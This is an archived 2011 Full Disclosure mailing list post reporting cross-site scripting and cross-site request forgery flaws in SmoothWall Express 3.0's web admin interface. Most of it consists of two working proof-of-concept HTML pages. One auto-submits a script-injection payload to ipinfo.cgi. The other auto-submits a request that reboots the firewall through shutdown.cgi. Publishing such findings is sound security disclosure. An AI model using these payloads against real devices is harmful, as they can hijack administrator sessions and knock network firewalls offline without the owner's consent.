Full Disclosure mailing list archives
SmoothWall Express 3.0 csrf / xss
From: dave b <db.pub.mail () gmail com>
Date: Sun, 16 Jan 2011 21:18:00 +1100
The web management interface of SmoothWall Express 3.0 is vulnerable
to xss and csrf.

xss example:

<html>
<title> SmoothWall Express 3.0 xss </title>
<body>
<form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi" method="post" id="xssplz">
<input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
<input type="hidden" name="ACTION" value='Run'></input>
</form>
<script>document.getElementById("xssplz").submit();</script>
</body>

csrf example:

<html>
<title> SmoothWall Express 3.0 csrf </title>
<body>
<form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi" method="post" id="csrfplz">
<input type="hidden" name="ACTION" value='Reboot'></input>
</form>
<script>document.getElementById("csrfplz").submit();</script>
</body>

--
Something's rotten in the state of Denmark. -- Shakespeare